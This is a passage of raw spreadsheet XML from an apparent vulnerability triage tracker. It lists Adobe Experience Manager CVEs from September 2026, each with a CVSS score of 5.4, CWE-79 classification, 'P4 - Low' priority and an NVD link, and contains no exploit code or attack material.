t="inlineStr"><is><t>NVD</t></is></c><c r="O1395" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1395" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1395" s="5" t="inlineStr" /><c r="R1395" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75675</t></is></c></row><row r="1396"><c r="A1396" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1396" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1396" s="5" t="inlineStr"><is><t>CVE-2026-75677</t></is></c><c r="D1396" s="5" t="n"><v>5.4</v></c><c r="E1396" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1396" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1396" s="5" t="inlineStr" /><c r="H1396" s="5" t="n"><v>0.003</v></c><c r="I1396" s="5" t="inlineStr" /><c r="J1396" s="5" t="inlineStr" /><c r="K1396" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1396" s="5" t="inlineStr" /><c r="M1396" s="5" t="inlineStr" /><c r="N1396" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1396" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1396" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1396" s="5" t="inlineStr" /><c r="R1396" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75677</t></is></c></row><row r="1397"><c r="A1397" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1397" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1397" s="5" t="inlineStr"><is><t>CVE-2026-75678</t></is></c><c r="D1397" s="5" t="n"><v>5.4</v></c><c r="E1397" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1397" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1397" s="5" t="inlineStr" /><c r="H1397" s="5" t="n"><v>0.003</v></c><c r="I1397" s="5" t="inlineStr" /><c r="J1397" s="5" t="inlineStr" /><c r="K1397" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1397" s="5" t="inlineStr" /><c r="M1397" s="5" t="inlineStr" /><c r="N1397" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1397" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1397" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1397" s="5" t="inlineStr" /><c r="R1397" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75678</t></is></c></row><row r="1398"><c r="A1398" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1398" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1398" s="5" t="inlineStr"><is><t>CVE-2026-75679</t></is></c><c r="D1398" s="5" t="n"><v>5.4</v></c><c r="E1398" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1398" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1398" s="5" t="inlineStr" /><c r="H1398" s="5" t="n"><v>0.003</v></c><c r="I1398" s="5" t="inlineStr" /><c r="J1398" s="5" t="inlineStr" /><c r="K1398" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1398" s="5" t="inlineStr" /><c r="M1398" s="5" t="inlineStr" /><c r="N1398" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1398" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1398" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1398" s="5" t="inlineStr" /><c r="R1398" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75679</t></is></c></row><row r="1399"><c r="A1399" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1399" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1399" s="5" t="inlineStr"><is><t>CVE-2026-75680</t></is></c><c r="D1399" s="5" t="n"><v>5.4</v></c><c r="E1399" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1399" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1399" s="5" t="inlineStr" /><c r="H1399" s="5" t="n"><v>0.003</v></c><c r="I1399" s="5" t="inlineStr" /><c r="J1399" s="5" t="inlineStr" /><c r="K1399" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1399" s="5" t="inlineStr" /><c r="M1399" s="5" t="inlineStr" /><c r="N1399" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1399" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1399" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1399" s="5" t="inlineStr" /><c r="R1399" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S139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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75680</t></is></c></row><row r="1400"><c r="A1400" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1400" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1400" s="5" t="inlineStr"><is><t>CVE-2026-75681</t></is></c><c r="D1400" s="5" t="n"><v>5.4</v></c><c r="E1400" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1400" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1400" s="5" t="inlineStr" /><c r="H1400" s="5" t="n"><v>0.003</v></c><c r="I1400" s="5" t="inlineStr" /><c r="J1400" s="5" t="inlineStr" /><c r="K1400" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1400" s="5" t="inlineStr" /><c r="M1400" s="5" t="inlineStr" /><c r="N1400" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1400" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1400" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1400" s="5" t="inlineStr" /><c r="R1400" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75681</t></is></c></row><row r="1401"><c r="A1401" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1401" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1401" s="5" t="inlineStr"><is><t>CVE-2026-75683</t></is></c><c r="D1401" s="5" t="n"><v>5.4</v></c><c r="E1401" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1401" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1401" s="5" t="inlineStr" /><c r="H1401" s="5" t="n"><v>0.003</v></c><c r="I1401" s="5" t="inlineStr" /><c r="J1401" s="5" t="inlineStr" /><c r="K1401" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1401" s="5" t="inlineStr" /><c r="M1401" s="5" t="inlineStr" /><c r="N1401" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1401" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1401" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1401" s="5" t="inlineStr" /><c r="R1401" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75683</t></is></c></row><row r="1402"><c r="A1402" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1402" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1402" s="5" t="inlineStr"><is><t>CVE-2026-75685</t></is></c><c r="D1402" s="5" t="n"><v>5.4</v></c><c r="E1402" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1402" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1402" s="5" t="inlineStr" /><c r="H1402" s="5" t="n"><v>0.003</v></c><c r="I1402" s="5" t="inlineStr" /><c r="J1402" s="5" t="inlineStr" /><c r="K1402" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1402" s="5" t="inlineStr" /><c r="M1402" s="5" t="inlineStr" /><c r="N1402" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1402" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1402" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1402" s="5" t="inlineStr" /><c r="R1402" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75685</t></is></c></row><row r="1403"><c r="A1403" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1403" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1403" s="5" t="inlineStr"><is><t>CVE-2026-75687</t></is></c><c r="D1403" s="5" t="n"><v>5.4</v></c><c r="E1403" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1403" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1403" s="5" t="inlineStr" /><c r="H1403" s="5" t="n"><v>0.003</v></c><c r="I1403" s="5" t="inlineStr" /><c r="J1403" s="5" t="inlineStr" /><c r="K1403" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1403" s="5" t="inlineStr" /><c r="M1403" s="5" t="inlineStr" /><c r="N1403" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1403" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1403" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1403" s="5" t="inlineStr" /><c r="R1403" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75687</t></is></c></row><row r="1404"><c r="A1404" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1404" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1404" s="5" t="inlineStr"><is><t>CVE-2026-75690</t></is></c><c r="D1404" s="5" t="n"><v>5.4</v></c><c r="E1404" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1404" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1404" s="5" t="inlineStr" /><c r="H1404" s="5" t="n"><v>0.003</v></c><c r="I1404" s="5" t="inlineStr" /><c r="J1404" s="5" t="inlineStr" /><c r="K1404" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1404" s="5" t="inlineStr" /><c r="M1404" s="5" t="inlineStr" /><c r="N1404" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1404" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1404" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1404" s="5" t="inlineStr" /><c r="R1404" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75690</t></is></c></row><row r="1405"><c r="A1405" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1405" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1405" s="5" t="inlineStr"><is><t>CVE-2026-75691</t></is></c><c r="D1405" s="5" t="n"><v>5.4</v></c><c r="E1405" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1405" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1405" s="5" t="inlineStr" /><c r="H1405" s="5" t="n"><v>0.003</v></c><c r="I1405" s="5" t="inlineStr" /><c r="J1405" s="5" t="inlineStr" /><c r="K1405" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1405" s="5" t="inlineStr" /><c r="M1405" s="5" t="inlineStr" /><c r="N1405" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1405" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1405" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1405" s="5" t="inlineStr" /><c r="R1405" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75691</t></is></c></row><row r="1406"><c r="A1406" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1406" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1406" s="5" t="inlineStr"><is><t>CVE-2026-75692</t></is></c><c r="D1406" s="5" t="n"><v>5.4</v></c><c r="E1406" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1406" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1406" s="5" t="inlineStr" /><c r="H1406" s="5" t="n"><v>0.003</v></c><c r="I1406" s="5" t="inlineStr" /><c r="J1406" s="5" t="inlineStr" /><c r="K1406" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1406" s="5" t="inlineStr" /><c r="M1406" s="5" t="inlineStr" /><c r="N1406" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1406" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1406" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1406" s="5" t="inlineStr" /><c r="R1406" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75692</t></is></c></row><row r="1407"><c r="A1407" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1407" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1407" s="5" t="inlineStr"><is><t>CVE-2026-75693</t></is></c><c r="D1407" s="5" t="n"><v>5.4</v></c><c r="E1407" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1407" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1407" s="5" t="inlineStr" /><c r="H1407" s="5" t="n"><v>0.003</v></c><c r="I1407" s="5" t="inlineStr" /><c r="J1407" s="5" t="inlineStr" /><c r="K1407" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1407" s="5" t="inlineStr" /><c r="M1407" s="5" t="inlineStr" /><c r="N1407" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1407" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1407" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1407" s="5" t="inlineStr" /><c r="R1407" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75693</t></is></c></row><row r="1408"><c r="A1408" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1408" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1408" s="5" t="inlineStr"><is><t>CVE-2026-75694</t></is></c><c r="D1408" s="5" t="n"><v>5.4</v></c><c r="E1408" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1408" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1408" s="5" t="inlineStr" /><c r="H1408" s="5" t="n"><v>0.003</v></c><c r="I1408" s="5" t="inlineStr" /><c r="J1408" s="5" t="inlineStr" /><c r="K1408" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1408" s="5" t="inlineStr" /><c r="M1408" s="5" t="inlineStr" /><c r="N1408" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1408" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1408" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1408" s="5" t="inlineStr" /><c r="R1408" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75694</t></is></c></row><row r="1409"><c r="A1409" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1409" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1409" s="5" t="inlineStr"><is><t>CVE-2026-75695</t></is></c><c r="D1409" s="5" t="n"><v>5.4</v></c><c r="E1409" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1409" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1409" s="5" t="inlineStr" /><c r="H1409" s="5" t="n"><v>0.003</v></c><c r="I1409" s="5" t="inlineStr" /><c r="J1409" s="5" t="inlineStr" /><c r="K1409" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1409" s="5" t="inlineStr" /><c r="M1409" s="5" t="inlineStr" /><c r="N1409" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1409" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1409" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1409" s="5" t="inlineStr" /><c r="R1409" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S140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9" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75695</t></is></c></row><row r="1410"><c r="A1410" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1410" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1410" s="5" t="inlineStr"><is><t>CVE-2026-75696</t></is></c><c r="D1410" s="5" t="n"><v>5.4</v></c><c r="E1410" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1410" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1410" s="5" t="inlineStr" /><c r="H1410" s="5" t="n"><v>0.003</v></c><c r="I1410" s="5" t="inlineStr" /><c r="J1410" s="5" t="inlineStr" /><c r="K1410" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1410" s="5" t="inlineStr" /><c r="M1410" s="5" t="inlineStr" /><c r="N1410" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1410" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1410" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1410" s="5" t="inlineStr" /><c r="R1410" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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0" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75696</t></is></c></row><row r="1411"><c r="A1411" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1411" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1411" s="5" t="inlineStr"><is><t>CVE-2026-75700</t></is></c><c r="D1411" s="5" t="n"><v>5.4</v></c><c r="E1411" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1411" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1411" s="5" t="inlineStr" /><c r="H1411" s="5" t="n"><v>0.003</v></c><c r="I1411" s="5" t="inlineStr" /><c r="J1411" s="5" t="inlineStr" /><c r="K1411" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1411" s="5" t="inlineStr" /><c r="M1411" s="5" t="inlineStr" /><c r="N1411" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1411" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1411" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1411" s="5" t="inlineStr" /><c r="R1411" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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1" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75700</t></is></c></row><row r="1412"><c r="A1412" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1412" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1412" s="5" t="inlineStr"><is><t>CVE-2026-75701</t></is></c><c r="D1412" s="5" t="n"><v>5.4</v></c><c r="E1412" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1412" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1412" s="5" t="inlineStr" /><c r="H1412" s="5" t="n"><v>0.003</v></c><c r="I1412" s="5" t="inlineStr" /><c r="J1412" s="5" t="inlineStr" /><c r="K1412" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1412" s="5" t="inlineStr" /><c r="M1412" s="5" t="inlineStr" /><c r="N1412" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1412" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1412" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1412" s="5" t="inlineStr" /><c r="R1412" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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2" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75701</t></is></c></row><row r="1413"><c r="A1413" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1413" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1413" s="5" t="inlineStr"><is><t>CVE-2026-75702</t></is></c><c r="D1413" s="5" t="n"><v>5.4</v></c><c r="E1413" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1413" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1413" s="5" t="inlineStr" /><c r="H1413" s="5" t="n"><v>0.003</v></c><c r="I1413" s="5" t="inlineStr" /><c r="J1413" s="5" t="inlineStr" /><c r="K1413" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1413" s="5" t="inlineStr" /><c r="M1413" s="5" t="inlineStr" /><c r="N1413" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1413" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1413" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1413" s="5" t="inlineStr" /><c r="R1413" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75702</t></is></c></row><row r="1414"><c r="A1414" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1414" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1414" s="5" t="inlineStr"><is><t>CVE-2026-75704</t></is></c><c r="D1414" s="5" t="n"><v>5.4</v></c><c r="E1414" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1414" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1414" s="5" t="inlineStr" /><c r="H1414" s="5" t="n"><v>0.003</v></c><c r="I1414" s="5" t="inlineStr" /><c r="J1414" s="5" t="inlineStr" /><c r="K1414" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1414" s="5" t="inlineStr" /><c r="M1414" s="5" t="inlineStr" /><c r="N1414" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1414" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1414" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1414" s="5" t="inlineStr" /><c r="R1414" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75704</t></is></c></row><row r="1415"><c r="A1415" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1415" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1415" s="5" t="inlineStr"><is><t>CVE-2026-75705</t></is></c><c r="D1415" s="5" t="n"><v>5.4</v></c><c r="E1415" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1415" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1415" s="5" t="inlineStr" /><c r="H1415" s="5" t="n"><v>0.003</v></c><c r="I1415" s="5" t="inlineStr" /><c r="J1415" s="5" t="inlineStr" /><c r="K1415" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1415" s="5" t="inlineStr" /><c r="M1415" s="5" t="inlineStr" /><c r="N1415" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1415" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1415" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1415" s="5" t="inlineStr" /><c r="R1415" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75705</t></is></c></row><row r="1416"><c r="A1416" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1416" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1416" s="5" t="inlineStr"><is><t>CVE-2026-75706</t></is></c><c r="D1416" s="5" t="n"><v>5.4</v></c><c r="E1416" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1416" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1416" s="5" t="inlineStr" /><c r="H1416" s="5" t="n"><v>0.003</v></c><c r="I1416" s="5" t="inlineStr" /><c r="J1416" s="5" t="inlineStr" /><c r="K1416" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1416" s="5" t="inlineStr" /><c r="M1416" s="5" t="inlineStr" /><c r="N1416" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1416" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1416" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1416" s="5" t="inlineStr" /><c r="R1416" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75706</t></is></c></row><row r="1417"><c r="A1417" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1417" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1417" s="5" t="inlineStr"><is><t>CVE-2026-75707</t></is></c><c r="D1417" s="5" t="n"><v>5.4</v></c><c r="E1417" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1417" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1417" s="5" t="inlineStr" /><c r="H1417" s="5" t="n"><v>0.003</v></c><c r="I1417" s="5" t="inlineStr" /><c r="J1417" s="5" t="inlineStr" /><c r="K1417" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1417" s="5" t="inlineStr" /><c r="M1417" s="5" t="inlineStr" /><c r="N1417" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1417" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1417" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1417" s="5" t="inlineStr" /><c r="R1417" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75707</t></is></c></row><row r="1418"><c r="A1418" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1418" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1418" s="5" t="inlineStr"><is><t>CVE-2026-75708</t></is></c><c r="D1418" s="5" t="n"><v>5.4</v></c><c r="E1418" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1418" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1418" s="5" t="inlineStr" /><c r="H1418" s="5" t="n"><v>0.003</v></c><c r="I1418" s="5" t="inlineStr" /><c r="J1418" s="5" t="inlineStr" /><c r="K1418" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1418" s="5" t="inlineStr" /><c r="M1418" s="5" t="inlineStr" /><c r="N1418" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1418" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1418" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1418" s="5" t="inlineStr" /><c r="R1418" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S141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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75708</t></is></c></row><row r="1419"><c r="A1419" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1419" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1419" s="5" t="inlineStr"><is><t>CVE-2026-75709</t></is></c><c r="D1419" s="5" t="n"><v>5.4</v></c><c r="E1419" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1419" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1419" s="5" t="inlineStr" /><c r="H1419" s="5" t="n"><v>0.003</v></c><c r="I1419" s="5" t="inlineStr" /><c r="J1419" s="5" t="inlineStr" /><c r="K1419" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1419" s="5" t="inlineStr" /><c r="M1419" s="5" t="inlineStr" /><c r="N1419" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1419" s="5" 